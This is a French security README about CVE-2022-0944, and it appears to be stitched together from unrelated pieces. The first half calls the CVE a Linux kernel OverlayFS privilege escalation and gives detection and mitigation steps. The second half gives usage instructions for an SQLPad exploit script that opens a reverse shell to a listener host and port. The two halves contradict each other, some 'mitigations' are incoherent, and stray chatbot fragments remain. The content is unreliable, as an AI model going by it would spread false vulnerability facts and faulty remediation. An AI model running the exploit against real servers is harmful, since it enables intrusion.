
Guide d'exploitation et d'atténuation pour CVE-2022-0944, une vulnérabilité d'élévation de privilèges du noyau Linux dans OverlayFS, avec des scripts de détection et des instructions de correction.
Avis de sécurité et guide d'atténuation pour la vulnérabilité d'élévation de privilèges du noyau Linux dans OverlayFS.
CVE-2022-0944 est une vulnérabilité de sécurité dans le sous-système OverlayFS du noyau Linux qui permet à un attaquant local d'élever ses privilèges via une gestion inappropriée de la création de fichiers dans des configurations spécifiques.

🚨 Impact
Un attaquant local pourrait :
Obtenir les privilèges root via des opérations sur des fichiers contrefaits
Contourner les restrictions de sécurité
Modifier des fichiers système sensibles
Compromettre l'intégrité complète du système
🔍 Détection
grep CVE-2022-0944 /var/log/apt/history.log
# Pour RHEL/CentOS :
rpm -q --changelog kernel | grep CVE-2022-0944
4.🛡️ Atténuation
Correctifs officiels
Mettez à jour vers l'une de ces versions corrigées :
Noyau Linux 5.16.12 ou ultérieur
Correctifs rétroportés spécifiques au fournisseur
Commande de mise à jour :
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
sudo yum update kernel
Solutions de contournement (si le correctif n'est pas immédiat)
Restreindre l'utilisation d'OverlayFS :
sudo modprobe -r overlay
Imposer des restrictions d'espace de noms :
# Créer un espace de noms utilisateur non privilégié
unshare -Ur
# Monter avec des restrictions utilisateur
mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
Appliquer des politiques SELinux/AppArmor : type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }
⚠️ Avertissement Ce document est fourni à titre informatif uniquement. Bien que des efforts aient été faits pour assurer l'exactitude, aucune garantie n'est offerte. Testez toujours les correctifs dans un environnement de développement avant tout déploiement en production.
Dernière mise à jour : 2023-10-01 | Voir le journal des modifications
Fonctionnalités clés :
Ce format README convient à :
Souhaitez-vous que je :
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL vers SQLPad
lhost Adresse hôte de l'écouteur pour le reverse shell
lport Port de l'écouteur pour le reverse shell
username nom d'utilisateur de connexion (optionnel)
password mot de passe de connexion (optionnel)
options:
-h, --help afficher ce message d'aide et quitter
Exemple :
# installer les dépendances
pip install -r requirements.txt
# démarrer le conteneur docker sqlpad
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# déclencher l'exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
Ce dépôt contient du code et des outils destinés uniquement à des fins éducatives, spécifiquement pour une utilisation dans des cours de cybersécurité et des environnements d'apprentissage. L'auteur de ce code décline toute responsabilité quant aux conséquences découlant de l'utilisation, de la mauvaise utilisation ou de la modification de ce code. Le code est fourni "en l'état" sans aucune garantie, expresse ou implicite, y compris mais sans s'y limiter, les garanties implicites de qualité marchande ou d'adéquation à un usage particulier.